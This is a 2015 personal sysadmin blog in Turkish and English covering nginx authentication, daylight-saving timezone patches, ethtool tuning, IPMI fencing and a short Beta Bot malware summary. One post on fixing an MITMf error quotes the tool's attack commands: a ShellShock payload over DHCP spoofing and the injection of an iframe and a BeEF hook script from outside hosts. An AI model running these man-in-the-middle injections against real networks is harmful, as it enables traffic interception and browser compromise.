Monday, October 26, 2015

nginx: reverse proxy with basic authentication

/etc/nginx/sites-enabled/default:

server {
...

location /web/x/ {
        proxy_pass http://127.0.0.1:8080/;
       auth_basic "Restricted";
       auth_basic_user_file /etc/nginx/.htpasswd; 
}
...
}

Tuesday, October 20, 2015

linux, freebsd: 8 Kasım yaz saatının sonra ermesı - kış saati uygulaması için sunucuda yapılması gerekenler

 8 Kasım 2015 kış saatı uygulaması (yaz saati uygulamasının sona ermesi) için sunucuda yapılması gerekenler:

Ntp sunucu kullanılıyor olsanız dahi patch'i uygulamak durumundasınız.

Redhat Linux kış saati 6.5 üzerinde yaptığım işlemler

Eğer redhat 6 tabanlı bir sisteminiz varsa aşağıdaki rpm kurulumu işinizi görecektir.Eğer redhat 7 tabanlı bir sisteminiz varsa buna uygun rpm'i yüklemelisiniz. Patch kurulumu sonrası sisteminizin otomatik saat güncellemesini alabimesi için doğru timezone'da olduğunuzu da teyid etmelisiniz. (Bknz:http://siyahsapkaorg.blogspot.com.tr/2015/10/linux-how-to-get-timezone-information.html)

[root@node1 ~]# rpm -Uvh http://mirror.centos.org/centos/6/updates/x86_64/Packages/tzdata-2015g-2.el6.noarch.rpm
Retrieving http://mirror.centos.org/centos/6/updates/x86_64/Packages/tzdata-2015g-2.el6.noarch.rpm
warning: /var/tmp/rpm-tmp.pTNoiM: Header V3 RSA/SHA1 Signature, key ID c105b9de: NOKEY
Preparing...                ########################################### [100%]
   1:tzdata                 ########################################### [100%]

[root@node1 ~]# zdump -c 2015,2016 -v "Europe/Istanbul"
Europe/Istanbul  -9223372036854775808 = NULL
Europe/Istanbul  -9223372036854689408 = NULL
Europe/Istanbul  Sun Mar 29 00:59:59 2015 UTC = Sun Mar 29 02:59:59 2015 EET isdst=0 gmtoff=7200
Europe/Istanbul  Sun Mar 29 01:00:00 2015 UTC = Sun Mar 29 04:00:00 2015 EEST isdst=1 gmtoff=10800
Europe/Istanbul  Sun Nov  8 00:59:59 2015 UTC = Sun Nov  8 03:59:59 2015 EEST isdst=1 gmtoff=10800
Europe/Istanbul  Sun Nov  8 01:00:00 2015 UTC = Sun Nov  8 03:00:00 2015 EET isdst=0 gmtoff=7200
Europe/Istanbul  9223372036854689407 = NULL
Europe/Istanbul  9223372036854775807 = NULL



https://rhn.redhat.com/errata/RHEA-2015-1863.html

https://bugs.launchpad.net/ubuntu/+source/tzdata/+bug/1503560


https://phoneboy.com/1381/use-ntp-you-still-need-daylight-saving-time-patches/ 

FreeBSD kış saati 8.3 x86_64 sistem üzerinde yaptığım işlemler:


tedbir amaçlı eski zoneinfo dosyalarımızın backup'ını alalım

# tar -pczf zoneinfo-backup.tgz /usr/share/zoneinfo-backup

zone dosyamızın yolunu öğrenelim

Bu dosyayı güncel olanı ile değiştireceğiz.

# ls -al /etc/localtime
lrwxr-xr-x  1 root  wheel  35 Jun 11  2014 /etc/localtime -> /usr/share/zoneinfo/Europe/Istanbul



# pwd
/root
# mkdir tz

# cd tz
# wget --retr-symlinks 'ftp://ftp.iana.org/tz/tz*-latest.tar.gz'
# gzip -dc tzcode-latest.tar.gz | tar -xf -
# gzip -dc tzdata-latest.tar.gz | tar -xf -
# make TOPDIR=/root/tz install


zone dosyamızı güncelleyelim

# cp /root/tz/etc/zoneinfo/Europe/Istanbul /usr/share/zoneinfo/Europe/Istanbul


ve son olarak kontrol işlemlerimizi gerçekleştiriyoruz:

# date "+%Z %z"
EEST +0300


# zdump -c 2015,2016 -v /etc/localtime
/etc/localtime  Sun Jan  0 00:00:00 1900 UTC = Sun Jan  0 00:00:00 1900 LMT isdst=0 gmtoff=0
/etc/localtime  Sun Jan  0 00:00:00 1900 UTC = Sun Jan  0 00:00:00 1900 LMT isdst=0 gmtoff=0
/etc/localtime  Sun Mar 29 00:59:59 2015 UTC = Sun Mar 29 02:59:59 2015 EET isdst=0 gmtoff=7200
/etc/localtime  Sun Mar 29 01:00:00 2015 UTC = Sun Mar 29 04:00:00 2015 EEST isdst=1 gmtoff=10800
/etc/localtime  Sun Nov  8 00:59:59 2015 UTC = Sun Nov  8 03:59:59 2015 EEST isdst=1 gmtoff=10800
/etc/localtime  Sun Nov  8 01:00:00 2015 UTC = Sun Nov  8 03:00:00 2015 EET isdst=0 gmtoff=7200
/etc/localtime  Thu Dec 31 15:00:00 2015 UTC = Sat Dec  3 17:30:07 219250468 EET isdst=0 gmtoff=7200
/etc/localtime  Sat Dec  3 17:30:07 219250468 UTC = Sun Dec  4 17:30:07 219250468 EET isdst=0 gmtoff=7200 



Java Virtual Machine için time zone ayarı:,

java-1.7.0-openjdk-1.7.0.55-2.4.7.1.0.1.el6_5.x86_64
 
# export TZ=Europe/Istanbul ; java -jar /tmp/hede.jar ; date "+%Z%z %F %T"
Tue Oct 27 13:43:56 EEST 2015
Europe/Istanbul
Current time in milliseconds = 1445942636596 => Tue Oct 27 13:43:56 EEST 2015
Current time zone: Europe/Istanbul
EEST+0300 2015-10-27 13:43:56

http://www.java-examples.com/get-current-timezone-using-java-calendar

Eğer openjdk kullanıyorsanız. oracle jdk tzupdate yöntemi ile elde ettiğiniz timezone dosyalarını /usr/share/javazi/  dizinine kopyalamalısınız.

$ java -jar get-time-zone.jar
Tue Oct 27 15:21:28 EET 2015
Europe/Istanbul
Current time in milliseconds = 1445952088773 => Tue Oct 27 15:21:28 EET 2015
Current time zone: Europe/Istanbul

$ sudo cp -pfr openjdk/javazi/* /usr/share/javazi/

$ java -jar get-time-zone.jar
Tue Oct 27 16:22:02 EEST 2015
Europe/Istanbul
Current time in milliseconds = 1445952122068 => Tue Oct 27 16:22:02 EEST 2015
Current time zone: Europe/Istanbul


$ ls openjdk/javazi/
Africa   Antarctica  Atlantic   CET      EET  EST5EDT  Europe  HST     MET  MST7MDT  PST8PDT  WET
America  Asia        Australia  CST6CDT  EST  Etc      GMT     Indian  MST  Pacific  SystemV  ZoneInfoMappings

Thursday, October 15, 2015

how to install bigvideo.js with bower on centos 6.5

# yum install npm 
 
# npm install -g bower
 
-bash-4.1$ bower install BigVideo.js
bower jquery#>=1.7.2            cached git://github.com/jquery/jquery.git#2.1.4
bower jquery#>=1.7.2          validate 2.1.4 against git://github.com/jquery/jquery.git#>=1.7.2
bower jquery-ui#>=1.8.22        cached git://github.com/components/jqueryui.git#1.11.4
bower jquery-ui#>=1.8.22      validate 1.11.4 against git://github.com/components/jqueryui.git#>=1.8.22
bower video.js#>=3.2.0          cached git://github.com/videojs/video.js.git#5.0.0
bower video.js#>=3.2.0        validate 5.0.0 against git://github.com/videojs/video.js.git#>=3.2.0
bower imagesloaded#>=2.1.1      cached git://github.com/desandro/imagesloaded.git#3.1.8
bower imagesloaded#>=2.1.1    validate 3.1.8 against git://github.com/desandro/imagesloaded.git#>=2.1.1
bower BigVideo.js#*             cached git://github.com/dfcb/BigVideo.js.git#1.1.5
bower BigVideo.js#*           validate 1.1.5 against git://github.com/dfcb/BigVideo.js.git#*
bower jquery#>=1.6              cached git://github.com/jquery/jquery.git#2.1.4
bower jquery#>=1.6            validate 2.1.4 against git://github.com/jquery/jquery.git#>=1.6
bower eventEmitter#4.x          cached git://github.com/Olical/EventEmitter.git#4.3.0
bower eventEmitter#4.x        validate 4.3.0 against git://github.com/Olical/EventEmitter.git#4.x
bower eventie#>=1.0.4 <2        cached git://github.com/desandro/eventie.git#1.0.6
bower eventie#>=1.0.4 <2      validate 1.0.6 against git://github.com/desandro/eventie.git#>=1.0.4 <2
bower imagesloaded#>=2.1.1     install imagesloaded#3.1.8
bower video.js#>=3.2.0         install video.js#5.0.0
bower jquery-ui#>=1.8.22       install jquery-ui#1.11.4
bower jquery#>=1.7.2           install jquery#2.1.4
bower BigVideo#~1.1.5          install BigVideo#1.1.5
bower eventEmitter#4.x         install eventEmitter#4.3.0
bower eventie#>=1.0.4 <2       install eventie#1.0.6

imagesloaded#3.1.8 bower_components/imagesloaded
├── eventEmitter#4.3.0
└── eventie#1.0.6

video.js#5.0.0 bower_components/video.js

jquery-ui#1.11.4 bower_components/jquery-ui
└── jquery#2.1.4

jquery#2.1.4 bower_components/jquery

BigVideo#1.1.5 bower_components/BigVideo
├── imagesloaded#3.1.8
├── jquery#2.1.4
├── jquery-ui#1.11.4
└── video.js#5.0.0

eventEmitter#4.3.0 bower_components/eventEmitter

eventie#1.0.6 bower_components/eventie 

linux: how to get timezone information


timezone bilgisi /etc/localtime dosyasinda saklanir.
bu dosya binary formattadir. binary dosyalar icerisindeki degiskenler strings komutu ile analiz edilebilir.

$ strings /etc/localtime | more


timezone dosya boyutunu mevcut timezone dosyalari ile kiyaslayarak time zone bilgisi ogrenme:

$ cd /usr/share/zoneinfo
$ find * -type f -exec sh -c "diff -q /etc/localtime '{}' > /dev/null && echo {}" \;


datetime komutu ile timezone bilgisi ogrenme:

$ date +'%:z %Z'

Wednesday, October 14, 2015

linux shell: how to run bash command with timeout

bash$     (date >> /tmp/bw.log ; vnstat -l -i bond0 &>> /tmp/bw.log) & sleep 5 ; kill $!

linux shell: paste komutu kullanımı

$ cat testfile
A 1
B 2
C 3
D 4
E 5
F 6
G 7
H 8
I 9
J 10
                                                                                                                                                                                                                                         $ cut -d' ' -f2 testfile
1
2
3
4
5
6
7
8
9
10
                                                                                                                                                                                                                                         $ cut -d' ' -f2 testfile | paste -d, - -
1,2
3,4
5,6
7,8
9,10


Keywords: how to parse and group lines, how to convert lines to columns, how to  convert rows to columns

Thursday, October 8, 2015

bash: how to send syslog test message

echo "<133>$0[$$]: Test syslog message from Netcat" | nc -w1 -u 192.168.1.254 1501

Linux: how to optimize an ethernet adapter settings

 Platform:

Red Hat Enterprise Linux Server release 6.5 (Santiago)



how to learn ethernet device driver details

ethtool -i eth1

# ethtool -i eth1
driver: igb
version: 5.2.5
firmware-version: 2.1.0
bus-info: 0000:01:00.1
supports-statistics: yes
supports-test: yes
supports-eeprom-access: yes
supports-register-dump: yes
supports-priv-flags: no


# lspci -v | grep -A 14 '01:00.1'
01:00.1 Ethernet controller: Intel Corporation 82575EB Gigabit Network Connection (rev 02)
        Subsystem: Intel Corporation Device 34de
        Flags: bus master, fast devsel, latency 0, IRQ 28
        Memory at b1a00000 (32-bit, non-prefetchable) [size=128K]
        I/O ports at 1000 [size=32]
        Memory at b1a40000 (32-bit, non-prefetchable) [size=16K]
        Capabilities: [40] Power Management version 2
        Capabilities: [50] MSI: Enable- Count=1/1 Maskable- 64bit+
        Capabilities: [60] MSI-X: Enable+ Count=10 Masked-
        Capabilities: [a0] Express Endpoint, MSI 00
        Capabilities: [100] Advanced Error Reporting
        Capabilities: [140] Device Serial Number 00-1e-67-ff-ff-0c-9a-29
        Kernel driver in use: igb
        Kernel modules: igb



how to list ethernet adapter list

[root@inseptra ~]# lspci  | grep Ethernet
01:00.0 Ethernet controller: Intel Corporation 82575EB Gigabit Network Connection (rev 02)
01:00.1 Ethernet controller: Intel Corporation 82575EB Gigabit Network Connection (rev 02)
02:00.0 Ethernet controller: Intel Corporation I350 Gigabit Network Connection (rev 01)
02:00.1 Ethernet controller: Intel Corporation I350 Gigabit Network Connection (rev 01)



how to learn supported RX / TX ring buffer settings of an ethernet adapter

# ethtool -g eth1
Ring parameters for eth1:
Pre-set maximums:
RX:             4096
RX Mini:        0
RX Jumbo:       0
TX:             4096
Current hardware settings:
RX:             256
RX Mini:        0
RX Jumbo:       0
TX:             256



how to change ethernet adapter rx tx ring buffer settings

# ethtool -G eth1 rx 4096 tx 4096
# ethtool -g eth1
Ring parameters for eth1:
Pre-set maximums:
RX:             4096
RX Mini:        0
RX Jumbo:       0
TX:             4096
Current hardware settings:
RX:             4096
RX Mini:        0
RX Jumbo:       0
TX:             4096



how to change ethernet features for increase ids/ips packet processing performance

disable RX checksumming :
# ethtool -K eth1 rx off

disable TX checksumming
#
ethtool -K eth1 tx off

disable TCP segmentation offload# ethtool -K eth1 tso off
disable generic receive offload# ethtool -K eth1 gro off
disable generic segmentation offload# ethtool -K eth1 gso off

disable scatter-gather # ethtool -K eth1 sg off

how to show features of ethernet adapter

# ethtool -k eth1
Features for eth1:
rx-checksumming: on
tx-checksumming: on
        tx-checksum-ipv4: on
        tx-checksum-ip-generic: off [fixed]
        tx-checksum-ipv6: on
        tx-checksum-fcoe-crc: off [fixed]
        tx-checksum-sctp: off [fixed]
scatter-gather: on
        tx-scatter-gather: on
        tx-scatter-gather-fraglist: off [fixed]
tcp-segmentation-offload: on
        tx-tcp-segmentation: on
        tx-tcp-ecn-segmentation: off [fixed]
        tx-tcp6-segmentation: on
udp-fragmentation-offload: off [fixed]
generic-segmentation-offload: on
generic-receive-offload: on
large-receive-offload: off
rx-vlan-offload: on
tx-vlan-offload: on
ntuple-filters: off [fixed]
receive-hashing: on
highdma: on [fixed]
rx-vlan-filter: on [fixed]
vlan-challenged: off [fixed]
tx-lockless: off [fixed]
netns-local: off [fixed]
tx-gso-robust: off [fixed]
tx-fcoe-segmentation: off [fixed]
fcoe-mtu: off [fixed]
tx-nocache-copy: on
loopback: off [fixed]
rx-fcs: off [fixed]
rx-all: off [fixed]



Keywords: eth0 overrun problem, eth0 drop problem, packet processsing, ips, ids, suricata, snort, bro network security monitor, packet drop


2015-10-08 - Ali Okan Yuksel - yukselao@yandex.com




Sunday, October 4, 2015

mitmf: ImportError: cannot import name LOG


About mitmf:

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.
 
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
Inject an HTML IFrame using the Inject plugin:
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
Inject a JS script:
python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js



Hata:

Traceback (most recent call last):
  File "./mitmf.py", line 180, in <module>
    from core.protocols.smb.SMBserver import SMBserver
  File "/usr/share/mitmf/core/protocols/smb/SMBserver.py", line 5, in <module>
    from impacket import version, smbserver, LOG
ImportError: cannot import name LOG



Çözüm:

root@kali:~# pip install impacket --upgrade

Beta Bot Analysis

Win32.Neurevt, circulating under the name Beta Bot is an HTTP bot that entered in the underground market in the first part of 2013.

As we can see the information from the Sales Thread, this piece of code which written in C++ has many functionalities. Among others, we found:


  • AV-Disabling
  • Bot Killer
  • Ring3 Rootkit
  • Custom Injection Techniques
  • Proactive Defense Mode


At less than €500, Beta Bot is sold relatively cheap, considering its vast feature list. It includes also standard features for today’s bots, like different DOS-attack methods, DNS Blocker, etc...


Reference & details:

http://resources.infosecinstitute.com/beta-bot-analysis-part-1/

http://resources.infosecinstitute.com/beta-bot-analysis-part-2/


Credits and References:

https://github.com/KenMacD/betabot-re
https://blog.fortinet.com/post/neurevt-bot-analysis
http://vrt-blog.snort.org/2014/05/betabot-process-injection.html
https://asert.arbornetworks.com/beta-bot-a-code-review/

Thursday, October 1, 2015

IPMI: Intelligent Platform Management Interface

The Intelligent Platform Management Interface (IPMI) is a set of computer interface specifications for an autonomous computer subsystem that provides management and monitoring capabilities independently of the host system's CPU, firmware (BIOS or UEFI) and operating system. IPMI defines a set of interfaces used by system administrators for out-of-band management of computer systems and monitoring of their operation. For example, IPMI provides a way to manage a computer that may be powered off or otherwise unresponsive by using a network connection to the hardware rather than to an operating system or login shell.


fence_ipmilan

http://linux.die.net/man/8/fence_ipmilan

fence_ipmilan is an I/O Fencing agent which can be used with machines controlled by IPMI. This agent calls support software using ipmitool (http://ipmitool.sf.net/).
To use fence_ipmilan with HP iLO 3 you have to enable lanplus option (lanplus / -P) and increase wait after operation to 4 seconds (power_wait=4 / -T 4)
fence_ipmilan accepts options on the command line as well as from stdin. Fenced sends parameters through stdin when it execs the agent. fence_ipmilan can be run by itself with command line options. This is useful for testing and for turning outlets on or off from scripts.